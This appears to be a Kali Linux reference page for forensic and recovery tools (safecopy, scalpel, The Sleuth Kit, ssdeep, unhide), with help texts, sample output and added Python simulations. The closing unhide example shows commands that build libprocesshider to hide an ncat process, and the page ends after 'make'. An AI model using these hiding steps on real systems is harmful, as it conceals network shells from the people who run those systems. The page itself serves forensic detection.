-R <number> : At least that many read attempts are made on the first
bad block of a damaged area with minimum resolution.
More retries can sometimes recover a weak sector,
but at the cost of additional strain.
Default: 3
-Z <number> : On each error, force seek the read head from start to
end of the source device as often as specified.
That takes time, creates additional strain and might
not be supported by all devices or drivers.
Default: 1
-L <mode> : Use low level device calls as specified:
0 Do not use low level device calls
1 Attempt low level device calls
for error recovery only
2 Always use low level device calls
if available
Supported low level features in this version are:
SYSTEM DEVICE TYPE FEATURE
Linux cdrom/dvd bus/device reset
Linux cdrom read sector in raw mode
Linux floppy controller reset, twaddle
Default: 1
--sync : Use synchronized read calls (disable driver buffering).
Safecopy will use O_DIRECT if supported by the OS
and O_SYNC otherwise.
Default: Asynchronous read buffering by the OS is allowed
--forceopen : Keep trying to reopen the source after a read errer
useful for USB drives that go away temporarily.
Warning: This can cause safecopy to hang
until aborted manually!
Default: Abort on fopen() error
-s <blocks> : Start position where to start reading.
Will correspond to position 0 in the destination file.
Default: block 0
-l <blocks> : Maximum length of data to be read.
Default: Entire size of input file
-I <badblockfile> : Incremental mode. Assume the target file already
exists and has holes specified in the badblockfile.
It will be attempted to retrieve more data from
the listed blocks or from beyond the file size
of the target file only.
Warning: Without this option, the destination file
will be emptied prior to writing.
Use -I /dev/null if you want to continue a previous
run of safecopy without a badblock list.
Implies: -c 0 if -c is not specified
Default: none ( /dev/null if -c is given )
-i <bytes> : Blocksize to interpret the badblockfile given with -I.
Default: Blocksize as specified by -b
-c <blocks> : Continue copying at this position.
This allows continuing if the output is a block device
with a fixed size as opposed to a growable file,
where safecopy cannot determine how far it already got.
The blocksize used is the same as for the -I option.
-c 0 will continue at the current destination size.
Implies: -I /dev/null if -I is not specified
Default: none, 0 if -I is specified
-X <badblockfile> : Exclusion mode. If used together with -I,
excluded blocks override included blocks.
Safecopy will not read or write any data from
areas covered by exclude blocks.
Default: none ( 0 if -I is given )
-x <bytes> : Blocksize to interpret the badblockfile given with -X.
Default: Blocksize as specified by -b
-o <badblockfile> : Write a badblocks/e2fsck compatible bad block file.
Default: none
-S <seekscript> : Use external script for seeking in input file.
(Might be useful for tape devices and similar).
Seekscript must be an executable that takes the
number of blocks to be skipped as argv1 (1-64)
the blocksize in bytes as argv2
and the current position (in bytes) as argv3.
Return value needs to be the number of blocks
successfully skipped, or 0 to indicate seek failure.
The external seekscript will only be used
if lseek() fails and we need to skip over data.
Default: none
-M <string> : Mark unrecovered data with this string instead of
skipping it. This helps in later finding corrupted
files on rescued file system images.
The default is to zero unreadable data on creation
of output files, and leaving the data as it is
on any later run.
Warning: When used in combination with
incremental mode (-I) this may overwrite data
in any block that occurs in the -I file.
Blocks not in the -I file, or covered by the file
specified with -X are save from being overwritten.
Default: none
--debug <level> : Enable debug output. Level is a bit field,
add values together for more information:
program flow: 1
IO control: 2
badblock marking: 4
seeking: 8
incremental mode: 16
exclude mode: 32
or for all debug output: 255
Default: 0
-T <timingfile> : Write sector read timing information into
this file for later analysis.
Default: none
-h | --help : Show this text
Valid parameters for -f -r -b <size> options are:
<integer> Amount in bytes - i.e. 1024
<percentage>% Percentage of whole file/device size - e.g. 10%
<number>* -b only, number times blocksize reported by OS
<number>* -f and -r only, number times the value of -b
■ Usage example
# Create a block device with error sectors inserted
root@kali:~# dmsetup create baddevice << EOF
0 2000 linear /dev/loop0 0
2000 96 error
2096 202704 linear /dev/loop0 2096
EOF
# Copy the device containing errors to an image file
root@kali:~# safecopy /dev/mapper/baddevice backup.img
Low level device calls enabled mode: 1
Reported hw blocksize: 4096
Reported low level blocksize: 4096
Filesize not reported by stat(), trying seek().
File size: 105930752
Blocksize: 4096
Fault skip blocksize: 65536
Resolution: 4096
Min read attempts: 3
Head moves on read error: 1
Starting block: 0
Source: /dev/mapper/baddevice
Destination: backup.img
.!![250](+1024000){X<<<<}[262](+49152)
......................... ;-} 100%
Done!
Recovered bad blocks: 0
Unrecoverable bad blocks (bytes): 1 (49152)
Blocks (bytes) copied: 25862 (105930752)
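As an added example (not code from the original page or from the safecopy project), the Python script below models the skip-then-refine strategy that the -f, -r and -M options above describe: read block by block, jump ahead in fault-skip steps when a read fails, then walk back at resolution granularity to find the exact end of the bad area, zero-filling (or marking) what could not be read and producing a badblocks-style list. The "media" is constructed in memory with the same bad stretch as the dmsetup table above (96 sectors of 512 bytes starting at sector 2000); read_media is a stand-in for the device read.

```python
BLOCKSIZE = 4096     # -b: read block size
SKIP = 65536         # -f: fault skip block size (16 * BLOCKSIZE)
RESOLUTION = 4096    # -r: resolution when searching for the end of a bad area

# Constructed "media": 2 MiB of a known byte pattern with one unreadable
# stretch at bytes [1024000, 1073152), i.e. the 96 sectors of 512 bytes that
# the dmsetup table above marks as error.
MEDIA_SIZE = 2 * 1024 * 1024
MEDIA = bytes(range(256)) * (MEDIA_SIZE // 256)
BAD_RANGES = [(2000 * 512, 2096 * 512)]


def read_media(offset, length):
    """Simulated device read: fails if the range touches a bad sector."""
    for start, end in BAD_RANGES:
        if offset < end and offset + length > start:
            raise OSError(f"I/O error at offset {offset}")
    return MEDIA[offset:offset + length]


def rescue(read, size, blocksize=BLOCKSIZE, skip=SKIP, resolution=RESOLUTION, marker=b""):
    """Copy what can be read, skipping bad areas the way the stage presets do.
    Returns (image_bytes, list of (start, end) bad byte ranges)."""
    out = bytearray(size)          # unreadable data stays zero unless a marker is given
    bad = []
    pos = 0
    while pos < size:
        n = min(blocksize, size - pos)
        try:
            out[pos:pos + n] = read(pos, n)
            pos += n
            continue
        except OSError:
            pass
        bad_start = pos
        # Coarse phase (-f): jump ahead in `skip` steps until a read succeeds.
        probe = pos + skip
        while probe < size:
            try:
                read(probe, min(resolution, size - probe))
                break
            except OSError:
                probe += skip
        end = min(probe, size)
        # Fine phase (-r): walk back in `resolution` steps to the exact end.
        # Good data between two bad areas closer than `skip` is lost here,
        # which is the trade-off the -f help text warns about.
        while end - resolution > bad_start:
            try:
                read(end - resolution, resolution)
                end -= resolution
            except OSError:
                break
        bad.append((bad_start, end))
        if marker:                 # -M: mark unrecovered data instead of zeroing it
            length = end - bad_start
            out[bad_start:end] = (marker * (length // len(marker) + 1))[:length]
        pos = end
    return bytes(out), bad


def badblocks_list(bad, blocksize=BLOCKSIZE):
    """Block numbers for a badblocks/e2fsck style list (what -o writes)."""
    blocks = []
    for start, end in bad:
        blocks.extend(range(start // blocksize, -(-end // blocksize)))
    return blocks


if __name__ == "__main__":
    image, bad = rescue(read_media, MEDIA_SIZE)
    print("Unrecoverable bad areas (start, end, bytes):", [(s, e, e - s) for s, e in bad])
    print("badblocks list:", " ".join(str(b) for b in badblocks_list(bad)))
    print("Blocks (bytes) copied:", len(image) // BLOCKSIZE, f"({len(image)})")
```

The bad area comes out as blocks 250 to 261 (49152 bytes), which is what the `[250]` and `[262]` progress markers and the "1 (49152)" summary line above report for the real device.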
Scalpel
Recovers files from FAT16, FAT32, exFAT, NTFS, Ext2, Ext3, Ext4, JFS, XFS, ReiserFS, raw partitions and so on by analysing the data based on headers, footers and internal data structures (file carving).
■ Usage
root@kali:~# scalpel -h
Usage: scalpel [-b] [-c <config file>] [-d] [-h|V] [-i <file>]
[-m blocksize] [-n] [-o <outputdir>] [-O num] [-q clustersize]
[-r] [-s num] [-t <blockmap file>] [-u] [-v]
<imgfile> [<imgfile>] ...
-b Carve files even if defined footers aren't discovered within
maximum carve size for file type [foremost 0.69 compat mode].
-c Choose configuration file.
-d Generate header/footer database; will bypass certain optimizations
and discover all footers, so performance suffers. Doesn't affect
the set of files carved. **EXPERIMENTAL**
-h Print this help message and exit.
-i Read names of disk images from specified file.
-m Generate/update carve coverage blockmap file. The first 32bit
unsigned int in the file identifies the block size. Thereafter
each 32bit unsigned int entry in the blockmap file corresponds
to one block in the image file. Each entry counts how many
carved files contain this block. Requires more memory and
disk. **EXPERIMENTAL**
-n Don't add extensions to extracted files.
-o Set output directory for carved files.
-O Don't organize carved files by type. Default is to organize carved files
into subdirectories.
-p Perform image file preview; audit log indicates which files
would have been carved, but no files are actually carved.
-q Carve only when header is cluster-aligned.
-r Find only first of overlapping headers/footers [foremost 0.69 compat mode].
-s Skip n bytes in each disk image before carving.
-t Set directory for coverage blockmap. **EXPERIMENTAL**
-u Use carve coverage blockmap when carving. Carve only sections
of the image whose entries in the blockmap are 0. These areas
are treated as contiguous regions. **EXPERIMENTAL**
-V Print copyright information and exit.
-v Verbose mode
■ Usage example
root@kali:~# scalpel -o ./recover /dev/sda1
Carve lists built. Workload:
art with header "\x4a\x47\x04\x0e" and footer "\xcf\xc7\xcb" --> 0 files
art with header "\x4a\x47\x03\x0e" and footer "\xd0\xcb\x00\x00" --> 0 files
gif with header "\x47\x49\x46\x38\x37\x61" and footer "\x00\x3b" --> 0 files
gif with header "\x47\x49\x46\x38\x39\x61" and footer "\x00\x3b" --> 2 files
jpg with header "\xff\xd8\xff\x3f\x3f\x3f\x45\x78\x69\x66" and footer "\xff\xd9" --> 0 files
jpg with header "\xff\xd8\xff\x3f\x3f\x3f\x4a\x46\x49\x46" and footer "\xff\xd9" --> 5 files
png with header "\x50\x4e\x47\x3f" and footer "\xff\xfc\xfd\xfe" --> 0 files
[...]
Scalpel is done, files carved = 1420, elapsed = 6 seconds.
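As an added example (not code from the original page or from the scalpel project), here is a minimal header/footer carver in Python that shows what the "carve lists" above mean: each rule is an extension, a maximum carve size, a header and a footer, a header may contain "?" wildcard bytes (scalpel's default wildcard, printed as \x3f in the output above), and a file is carved from its header to the first footer found within the maximum size. The disk image is constructed in memory with a GIF, a JFIF JPEG and a GIF header that never gets a footer; the -b and -O behaviours are modelled by the carve_without_footer and organize parameters.

```python
import os
import re

# Carve rules in the spirit of scalpel.conf entries:
# (extension, max carve size, header, footer). A "?" in a header is the
# default wildcard byte; the workload list above prints it as \x3f.
CARVE_RULES = [
    ("gif", 5_000_000, b"GIF89a", b"\x00;"),
    ("jpg", 200_000_000, b"\xff\xd8\xff???JFIF", b"\xff\xd9"),
]

# Constructed "disk image": zero filler with a GIF and a JFIF JPEG embedded,
# plus a GIF header that is never followed by a footer.
GIF_DATA = b"GIF89a\x01\x00\x01\x00fake-gif-body\x00;"
JPG_DATA = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01fake-jpeg-body\xff\xd9"
ORPHAN = b"GIF89aheader-without-footer"
IMAGE = (b"\x00" * 100 + GIF_DATA + b"\x00" * 300 + JPG_DATA
         + b"\x00" * 50 + ORPHAN + b"\x00" * 20)


def header_regex(header, wildcard=b"?"):
    """Turn a header with wildcard bytes into a bytes regex."""
    parts = [b"." if bytes([b]) == wildcard else re.escape(bytes([b])) for b in header]
    return re.compile(b"".join(parts), re.DOTALL)


def carve(image, rules=CARVE_RULES, carve_without_footer=False):
    """Header/footer carving. Returns (extension, offset, data) tuples sorted
    by offset. carve_without_footer mirrors -b: with no footer inside the
    maximum carve size, take the maximum size instead of skipping the hit."""
    found = []
    for ext, max_size, header, footer in rules:
        for m in header_regex(header).finditer(image):
            start = m.start()
            limit = min(len(image), start + max_size)
            fpos = image.find(footer, m.end(), limit)
            if fpos != -1:
                end = fpos + len(footer)
            elif carve_without_footer:
                end = limit
            else:
                continue
            found.append((ext, start, image[start:end]))
    return sorted(found, key=lambda item: item[1])


def write_carved(results, outdir, organize=True):
    """Write carved files under outdir like -o; organize=False mirrors -O
    (all files in one directory instead of one subdirectory per type)."""
    paths = []
    for n, (ext, offset, data) in enumerate(results):
        subdir = os.path.join(outdir, ext) if organize else outdir
        os.makedirs(subdir, exist_ok=True)
        path = os.path.join(subdir, f"{n:08d}.{ext}")
        with open(path, "wb") as fh:
            fh.write(data)
        paths.append(path)
    return paths


if __name__ == "__main__":
    results = carve(IMAGE)
    for ext, max_size, header, footer in CARVE_RULES:
        count = sum(1 for r in results if r[0] == ext)
        print(f"{ext} with header {header!r} and footer {footer!r} --> {count} files")
    for ext, offset, data in results:
        print(f"  {ext} at offset {offset}, {len(data)} bytes")
    print("written:", write_carved(results, "recover"))
```

A practical caveat the example makes visible: the footer search stops at the first footer, so a footer byte sequence that also occurs inside the file body (common for short footers such as the two-byte GIF trailer) truncates the carved file, which is why carved output should always be validated with a proper format parser before it is trusted as evidence.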
The Sleuth Kit
A library and collection of command-line digital forensics tools.
■ Usage
root@kali:~# tsk_comparedir --help
usage: tsk_comparedir [-f fstype] [-i imgtype] [-b dev_sector_size] [-o sector_offset] [-P pooltype] [-B pool_volume_block] [-n start_inum] [-vV] image [image] comparison_directory
-i imgtype: The format of the image file (use '-i list' for supported types)
-b dev_sector_size: The size (in bytes) of the device sectors
-f fstype: The file system type (use '-f list' for supported types)
-o sector_offset: sector offset for file system to compare
-P pooltype: Pool container type (use '-P list' for supported types)
-B pool_volume_block: Starting block (for pool volumes only)
-n start_inum: inum for directory in image file to start compare at
-v: verbose output to stderr
-V: Print version
root@kali:~# tsk_gettimes --help
usage: tsk_gettimes [-vVm] [-i imgtype] [-b dev_sector_size] [-z zone] [-s seconds] image [image]
-i imgtype: The format of the image file (use '-i list' for supported types)
-b dev_sector_size: The size (in bytes) of the device sectors
-m: Calculate MD5 hash in output (slow)
-v: verbose output to stderr
-V: Print version
-z: Time zone of original machine (i.e. EST5EDT or GMT) (only useful with -l)
-s seconds: Time skew of original machine (in seconds) (only useful with -l & -m)
root@kali:~# tsk_recover --help
usage: tsk_recover [-vVae] [-f fstype] [-i imgtype] [-b dev_sector_size] [-o sector_offset] [-P pooltype] [-B pool_volume_block] [-d dir_inum] image [image] output_dir
-i imgtype: The format of the image file (use '-i list' for supported types)
-b dev_sector_size: The size (in bytes) of the device sectors
-f fstype: The file system type (use '-f list' for supported types)
-v: verbose output to stderr
-V: Print version
-a: Recover allocated files only
-e: Recover all files (allocated and unallocated)
-o sector_offset: sector offset for a volume to recover (recovers only that volume)
-P pooltype: Pool container type (use '-P list' for supported types)
-B pool_volume_block: Starting block (for pool volumes only)
-d dir_inum: Directory inum to recover from (must also specify a specific partition using -o or there must not be a volume system)
root@kali:~# fsstat --help
usage: fsstat [-tvV] [-f fstype] [-i imgtype] [-b dev_sector_size] [-o imgoffset] image
-t: display type only
-i imgtype: The format of the image file (use '-i list' for supported types)
-b dev_sector_size: The size (in bytes) of the device sectors
-f fstype: File system type (use '-f list' for supported types)
-o imgoffset: The offset of the file system in the image (in sectors)
-P pooltype: Pool container type (use '-P list' for supported types)
-B pool_volume_block: Starting block (for pool volumes only)
-v: verbose output to stderr
-V: Print version
-k password: Decryption password for encrypted volumes
root@kali:~# ffind --help
usage: ffind [-aduvV] [-f fstype] [-i imgtype] [-b dev_sector_size] [-o imgoffset] [-P pooltype] [-B pool_volume_block] image [images] inode
-a: Find all occurrences
-d: Find deleted entries ONLY
-u: Find undeleted entries ONLY
-f fstype: Image file system type (use '-f list' for supported types)
-i imgtype: The format of the image file (use '-i list' for supported types)
-b dev_sector_size: The size (in bytes) of the device sectors
-o imgoffset: The offset of the file system in the image (in sectors)
-P pooltype: Pool container type (use '-p list' for supported types)
-B pool_volume_block: Starting block (for pool volumes only)
-v: Verbose output to stderr
-V: Print version
root@kali:~# fls --help
usage: fls [-adDFlhpruvV] [-f fstype] [-i imgtype] [-b dev_sector_size] [-m dir/] [-o imgoffset] [-z ZONE] [-s seconds] image [images] [inode]
If [inode] is not given, the root directory is used
-a: Display "." and ".." entries
-d: Display deleted entries only
-D: Display only directories
-F: Display only files
-l: Display long version (like ls -l)
-i imgtype: Format of image file (use '-i list' for supported types)
-b dev_sector_size: The size (in bytes) of the device sectors
-f fstype: File system type (use '-f list' for supported types)
-m: Display output in mactime input format with
dir/ as the actual mount point of the image
-h: Include MD5 checksum hash in mactime output
-o imgoffset: Offset into image file (in sectors)
-P pooltype: Pool container type (use '-P list' for supported types)
-B pool_volume_block: Starting block (for pool volumes only)
-S snap_id: Snapshot ID (for APFS only)
-p: Display full path for each file
-r: Recurse on directory entries
-u: Display undeleted entries only
-v: verbose output to stderr
-V: Print version
-z: Time zone of original machine (i.e. EST5EDT or GMT) (only useful with -l)
-s seconds: Time skew of original machine (in seconds) (only useful with -l & -m)
-k password: Decryption password for encrypted volumes
root@kali:~# icat --help
usage: icat [-hrRsvV] [-f fstype] [-i imgtype] [-b dev_sector_size] [-o imgoffset] image [images] inum[-typ[-id]]
-h: Do not display holes in sparse files
-r: Recover deleted file
-R: Recover deleted file and suppress recovery errors
-s: Display slack space at end of file
-i imgtype: The format of the image file (use '-i list' for supported types)
-b dev_sector_size: The size (in bytes) of the device sectors
-f fstype: File system type (use '-f list' for supported types)
-o imgoffset: The offset of the file system in the image (in sectors)
-P pooltype: Pool container type (use '-P list' for supported types)
-B pool_volume_block: Starting block (for pool volumes only)
-S snap_id: Snapshot ID (for APFS only)
-v: verbose to stderr
-V: Print version
-k password: Decryption password for encrypted volumes
root@kali:~# ifind --help
usage: ifind [-alvV] [-f fstype] [-i imgtype] [-b dev_sector_size] [-o imgoffset] [-P pooltype] [-B pool_volume_block] [-d unit_addr] [-n file] [-p par_addr] [-z ZONE] image [images]
-a: find all inodes
-d unit_addr: Find the meta data given the data unit
-l: long format when -p is given
-n file: Find the meta data given the file name
-p par_addr: Find UNALLOCATED MFT entries given the parent's meta address (NTFS only)
-i imgtype: The format of the image file (use '-i list' for supported types)
-b dev_sector_size: The size (in bytes) of the device sectors
-f fstype: File system type (use '-f list' for supported types)
-o imgoffset: The offset of the file system in the image (in sectors)
-P pooltype: Pool container type (use '-p list' for supported types)
-B pool_volume_block: Starting block (for pool volumes only)
-v: Verbose output to stderr
-V: Print version
-z ZONE: Time zone setting when -l -p is given
root@kali:~# istat --help
usage: istat [-N num] [-f fstype] [-i imgtype] [-b dev_sector_size] [-o imgoffset] [-P pooltype] [-B pool_volume_block] [-z zone] [-s seconds] [-rvV] image inum
-N num: force the display of NUM address of block pointers
-r: display run list instead of list of block addresses
-z zone: time zone of original machine (i.e. EST5EDT or GMT)
-s seconds: Time skew of original machine (in seconds)
-i imgtype: The format of the image file (use '-i list' for supported types)
-b dev_sector_size: The size (in bytes) of the device sectors
-f fstype: File system type (use '-f list' for supported types)
-o imgoffset: The offset of the file system in the image (in sectors)
-P pooltype: Pool container type (use '-p list' for supported types)
-B pool_volume_block: Starting block (for pool volumes only)
-S snap_id: Snapshot ID (for APFS only)
-v: verbose output to stderr
-V: print version
-k password: Decryption password for encrypted volumes
root@kali:~# blkcat --help
usage: blkcat [-ahsvVw] [-f fstype] [-i imgtype] [-b dev_sector_size] [-o imgoffset] [-P pooltype] [-B pool_volume_block] [-u usize] image [images] unit_addr [num]
-a: displays in all ASCII
-h: displays in hexdump-like fashion
-i imgtype: The format of the image file (use '-i list' for supported types)
-b dev_sector_size: The size (in bytes) of the device sectors
-o imgoffset: The offset of the file system in the image (in sectors)
-P pooltype: Pool container type (use '-p list' for supported types)
-B pool_volume_block: Starting block (for pool volumes only)
-f fstype: File system type (use '-f list' for supported types)
-s: display basic block stats such as unit size, fragments, etc.
-v: verbose output to stderr
-V: display version
-w: displays in web-like (html) fashion
-u usize: size of each data unit in image (for raw, blkls, swap)
[num] is the number of data units to display (default is 1)
root@kali:~# blkls --help
usage: blkls [-aAelvV] [-f fstype] [-i imgtype] [-b dev_sector_size] [-o imgoffset] [-P pooltype] [-B pool_volume_block] image [images] [start-stop]
-e: every block (including file system metadata blocks)
-l: print details in time machine list format
-a: Display allocated blocks
-A: Display unallocated blocks
-f fstype: File system type (use '-f list' for supported types)
-i imgtype: The format of the image file (use '-i list' for supported types)
-b dev_sector_size: The size (in bytes) of the device sectors
-o imgoffset: The offset of the file system in the image (in sectors)
-P pooltype: Pool container type (use '-P list' for supported types)
-B pool_volume_block: Starting block (for pool volumes only)
-s: print slack space only (other flags are ignored
-v: verbose to stderr
-V: print version
■ Usage example
root@kali:~# tsk_comparedir app.img /var/www/
file: /app/evil.sh not found in image file
All files in image found in directory
root@kali:~# tsk_gettimes app.img
0|.editorconfig|46|r/rrw-r--r--|0|0|258|1731479609|1731479609|1731479609|1731479609
0|.env.|61|r/rrw-r--r--|0|0|1009|1731479609|1731479609|1731479609|1731479609
0|.styleci.yml|64|r/rrw-r--r--|0|0|194|1731479609|1731479609|1731479609|1731479609
0|app|67|d/drwxr-xr-x|0|0|1024|1731479609|1731479609|1731479609|1731479609
0|app/Console|68|d/drwxr-xr-x|0|0|1024|1731479609|1731479609|1731479609|1731479609
0|app/Console/Kernel.php|69|r/rrw-r--r--|0|0|827|1731479609|1731479609|1731479609|1731479609
[...]
root@kali:~# tsk_recover -a app.img recover
Files Recovered: 110
root@kali:~# fsstat app.img
FILE SYSTEM INFORMATION
--------------------------------------------
File System Type: Ext4
Volume Name:
Volume ID: 551ab0a2cd5665921a43a817ba6b392b
Last Written at: 2024-11-13 06:35:57 (UTC)
Last Checked at: 2024-11-13 06:32:28 (UTC)
Last Mounted at: 2024-11-13 06:32:38 (UTC)
Unmounted properly
Last mounted on: /mnt
Source OS: Linux
Dynamic Structure
Compat Features: Journal, Ext Attributes, Resize Inode, Dir Index
InCompat Features: Filetype, Extents, 64bit, Flexible Block Groups,
Read Only Compat Features: Sparse Super, Large File, Huge File, Extra Inode Size
Journal ID: 00
Journal Inode: 8
METADATA INFORMATION
--------------------------------------------
Inode Range: 1 - 25585
Root Directory: 2
Free Inodes: 25418
Inode Size: 256
CONTENT INFORMATION
--------------------------------------------
Block Groups Per Flex Group: 16
Block Range: 0 - 102399
Block Size: 1024
Reserved Blocks Before Block Groups: 1
Free Blocks: 89679
[...]
root@kali:~# ffind app.img 169
/public/index.php
root@kali:~# fls app.img 67
d/d 68: Console
d/d 70: Exceptions
d/d 72: Http
d/d 109: Models
d/d 114: Providers
d/d 120: Services
root@kali:~# fls app.img 109
r/r 110: Article.php
r/r 111: Comment.php
r/r 112: Tag.php
r/r 113: User.php
root@kali:~# icat app.img 135
<?php
use Illuminate\Support\Str;
return [
/*
|--------------------------------------------------------------------------
| Default Database Connection Name
|--------------------------------------------------------------------------
|
| Here you may specify which of the database connections below you wish
| to use as your default connection for all database work. Of course
| you may use many connections at once using the Database library.
|
*/
'default' => env('DB_CONNECTION', 'mysql'),
[...]
root@kali:~# ifind app.img -n config/database.php
135
root@kali:~# istat app.img 135
inode: 135
Allocated
Group: 0
Generation Id: 2918770598
uid / gid: 0 / 0
mode: rrw-r--r--
Flags: Extents,
size: 5054
num of links: 1
Inode Times:
Accessed: 2024-11-13 06:33:29.305026079 (UTC)
File Modified: 2024-11-13 06:33:29.305026079 (UTC)
Inode Modified: 2024-11-13 06:33:29.305026079 (UTC)
File Created: 2024-11-13 06:33:29.305026079 (UTC)
Direct Blocks:
10368 10369 10370 10371 10372
root@kali:~# blkcat app.img 10368
<?php
use Illuminate\Support\Str;
return [
/*
|--------------------------------------------------------------------------
| Default Database Connection Name
|--------------------------------------------------------------------------
|
| Here you may specify which of the database connections below you wish
| to use as your default connection for all database work. Of course
| you may use many connections at once using the Database library.
|
*/
'default' => env('DB_CONNECTION', 'mysql'),
/*
|--------------------------------------------------------------------------
| Database Connections
|--------------------------------------------------------------------------
|
| Here are each of the database connections setup for your application.
| Of course, examples of configuring each database platform that is
| supported by Laravel is shown below to make development simple.
|
|
| All database work in Laravel is done through th
root@kali:~# blkls -a app.img 10368-10372
<?php
use Illuminate\Support\Str;
return [
/*
|--------------------------------------------------------------------------
| Default Database Connection Name
|--------------------------------------------------------------------------
|
| Here you may specify which of the database connections below you wish
| to use as your default connection for all database work. Of course
| you may use many connections at once using the Database library.
|
*/
'default' => env('DB_CONNECTION', 'mysql'),
[...]
'cache' => [
'url' => env('REDIS_URL'),
'host' => env('REDIS_HOST', '127.0.0.1'),
'password' => env('REDIS_PASSWORD', null),
'port' => env('REDIS_PORT', '6379'),
'database' => env('REDIS_CACHE_DB', '1'),
],
],
];
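The pipe-separated lines that tsk_gettimes prints above (and that fls -m produces) are the body-file format that mactime turns into a timeline. As an added example (not code from the original page or from The Sleuth Kit), the Python script below parses such lines and builds the timeline the way mactime does: one row per distinct timestamp of each file, with a MACB column showing which of the four times (modified, accessed, changed, born) that row represents, plus a helper that lists files touched after a given moment. The first three body lines are taken from the tsk_gettimes output above; the fourth is constructed so that its timestamps differ from each other.

```python
from datetime import datetime, timezone

# Body-file lines as tsk_gettimes and "fls -m" write them:
# MD5|name|inode|mode|UID|GID|size|atime|mtime|ctime|crtime
# (MD5 is 0 because -m was not given). The first three lines are from the
# tsk_gettimes output above; the fourth is constructed.
BODY_LINES = [
    "0|.editorconfig|46|r/rrw-r--r--|0|0|258|1731479609|1731479609|1731479609|1731479609",
    "0|.env.|61|r/rrw-r--r--|0|0|1009|1731479609|1731479609|1731479609|1731479609",
    "0|app/Console/Kernel.php|69|r/rrw-r--r--|0|0|827|1731479609|1731479609|1731479609|1731479609",
    "0|storage/logs/laravel.log|301|r/rrw-r--r--|33|33|20480|1731483000|1731482400|1731482400|1731479609",
]


def parse_body_line(line):
    """Split one body-file line into a dict; times are keyed m/a/c/b."""
    md5, name, inode, mode, uid, gid, size, atime, mtime, ctime, crtime = line.split("|")
    return {
        "md5": md5, "name": name, "inode": inode, "mode": mode,
        "uid": int(uid), "gid": int(gid), "size": int(size),
        "times": {"m": int(mtime), "a": int(atime), "c": int(ctime), "b": int(crtime)},
    }


def mactime(lines):
    """Build a timeline the way mactime does: one row per distinct timestamp
    of each file, with a MACB column marking which of the four times it is
    (m=modified, a=accessed, c=changed/inode, b=born/created)."""
    rows = []
    for line in lines:
        if not line.strip():
            continue
        entry = parse_body_line(line)
        for ts in sorted(set(entry["times"].values())):
            flags = "".join(k if entry["times"][k] == ts else "." for k in "macb")
            rows.append((ts, flags, entry["size"], entry["mode"], entry["uid"],
                         entry["gid"], entry["inode"], entry["name"]))
    return sorted(rows, key=lambda r: (r[0], r[-1]))


def changed_after(lines, since):
    """Names of files whose content, metadata or creation time is newer than
    `since` (epoch seconds): the usual first question after an incident."""
    names = []
    for line in lines:
        if not line.strip():
            continue
        entry = parse_body_line(line)
        if max(entry["times"][k] for k in "mcb") > since:
            names.append(entry["name"])
    return names


def fmt_time(ts):
    """Epoch seconds to the UTC form the TSK tools print."""
    return datetime.fromtimestamp(ts, timezone.utc).strftime("%Y-%m-%d %H:%M:%S")


if __name__ == "__main__":
    for ts, flags, size, mode, uid, gid, inode, name in mactime(BODY_LINES):
        print(f"{fmt_time(ts)} {flags} {size:>8} {mode} {uid:>3} {gid:>3} {inode:>5} {name}")
    print("changed after 2024-11-13 06:33:29:", changed_after(BODY_LINES, 1731479609))
```

With a real image the input is simply the lines of `tsk_gettimes app.img` or `fls -r -m / app.img`; the atime column is the least reliable of the four on most mounted systems, so the "a" rows are usually the first to discount.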
ssdeep
A tool for recursively computing and matching fuzzy hashes. It can be used to compare files like ordinary hashes (md5sum, sha1sum, etc.), but it can also find similar files that differ only slightly.
■ Usage
root@kali:~# ssdeep -h
Usage: ssdeep [-m file] [-k file] [-dpgvrsblcxa] [-t val] [-h|-V] [FILES]
-m - Match FILES against known hashes in file
-k - Match signatures in FILES against signatures in file
-d - Directory mode, compare all files in a directory
-p - Pretty matching mode. Similar to -d but includes all matches
-g - Cluster matches together
-v - Verbose mode. Displays filename as its being processed
-r - Recursive mode
-s - Silent mode; all errors are suppressed
-b - Uses only the bare name of files; all path information omitted
-l - Uses relative paths for filenames
-c - Prints output in CSV format
-x - Compare FILES as signature files
-a - Display all matches, regardless of score
-t - Only displays matches above the given threshold
-h - Display this help message
-V - Display version number and exit
■ Example
# Create a copy of the file with "production" replaced by "development"
root@kali:~# sed -e 's/production/development/' config/app.php > tmp.php
# Check the MD5 hashes (no file has a matching hash value)
root@kali:~# md5sum tmp.php
9ae37d6fad53f2aa5263dec0f8901b46 tmp.php
root@kali:~# find config/ -type f -exec md5sum {} \;
488b21f09c887ceb3306242d0500736f config/cache.php
18c47205e34848ffffd98d4d65bd8e13 config/session.php
fbb56a82ae25fc5d2ce556acf26838ad config/logging.php
04bad29c587cf3fe5f1c7b7f63262c19 config/app.php
b65c6daa01e89ecd22338a88fbae40ce config/auth.php
52654f1235518c1e978f8766a0fbbec9 config/filesystems.php
3dfc6aef3bd17072e52a421d8d5215c0 config/mail.php
b7b09d68f8893547a7e5fbd5207fc8fa config/database.php
e3185f8bf937203123588b3884abf896 config/services.php
fa588a4871790fca01d6a90af9208d15 config/queue.php
# Create the hash file
root@kali:~# ssdeep -b tmp.php > hashes.txt
root@kali:~# cat hashes.txt
ssdeep,1.1--blocksize:hash:hash,filename
96:oZNbtsJtvFihlv8eJuW7QPupYT3z7bGdA:KNbtcvkhlvxJuAQSrdA,"tmp.php"
# Use the hash file to search for similar files under the directory
root@kali:~# ssdeep -b -m hashes.txt -d -r config
app.php matches hashes.txt:tmp.php (97)
Unhide
A forensic tool for finding processes and TCP/UDP ports hidden by rootkits / LKMs or other hiding techniques.
■ Usage
root@kali:~# unhide -h
Usage: unhide [options] test_list
Option :
-V Show version and exit
-v verbose
-h display this help
-m more checks (available only with procfs, checkopendir & checkchdir commands)
-r use alternate sysinfo test in meta-test
-f log result into unhide-linux.log file
-o same as '-f'
-d do a double check in brute test
-u inhibit stdout buffering of subprocesses (needs stdbuf command)
Test_list :
Test_list is one or more of the following
Standard tests :
brute
proc
procall
procfs
quick
reverse
sys
Elementary tests :
checkbrute
checkchdir
checkgetaffinity
checkgetparam
checkgetpgid
checkgetprio
checkRRgetinterval
checkgetsched
checkgetsid
checkkill
checknoprocps
checkopendir
checkproc
checkquick
checkreaddir
checkreverse
checksysinfo
checksysinfo2
checksysinfo3
■ Example
# Hide the ncat process using libprocesshider
root@kali:~# git clone https://github.com/gianlucaborello/libprocesshider
root@kali:~# cd libprocesshider
root@kali:~# sed -i 's/evil_script.py/ncat/' processhider.c
root@kali:~# make
